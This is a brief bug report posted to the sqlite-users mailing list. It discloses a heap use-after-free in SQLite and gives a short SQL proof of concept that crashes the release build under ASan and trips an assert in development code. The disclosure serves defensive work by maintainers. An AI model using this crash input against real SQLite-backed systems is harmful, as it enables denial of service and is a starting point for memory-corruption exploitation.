Hi, 

We found a heap UAF bug in sqlite. Here’s the PoC:

—
CREATE TABLE v0 ( v1 CHECK( CASE v1 WHEN '13' THEN 10 ELSE 10 END ) ) ;
CREATE TRIGGER x INSERT ON v0 BEGIN INSERT INTO v0 ( v1 , v1 ) SELECT v1 , v1 FROM v0 WHERE v1 < 10 ON CONFLICT DO NOTHING ; END ;
INSERT INTO v0 SELECT * FROM v0 WHERE v1 OR 0 ;
CREATE VIEW v2 ( v3 ) AS WITH x1 AS ( SELECT * FROM v2 ) SELECT v3 AS x , v3 AS y FROM v2 ;
ALTER TABLE zipfile RENAME TO t3 ;
—

This bug exists in both the release code and the development code. It triggers a UAF under ASan with the release code, while triggering an assert in the development code.

Yongheng & Rui
_______________________________________________
sqlite-users mailing list
sqlite-users@mailinglists.sqlite.org
http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users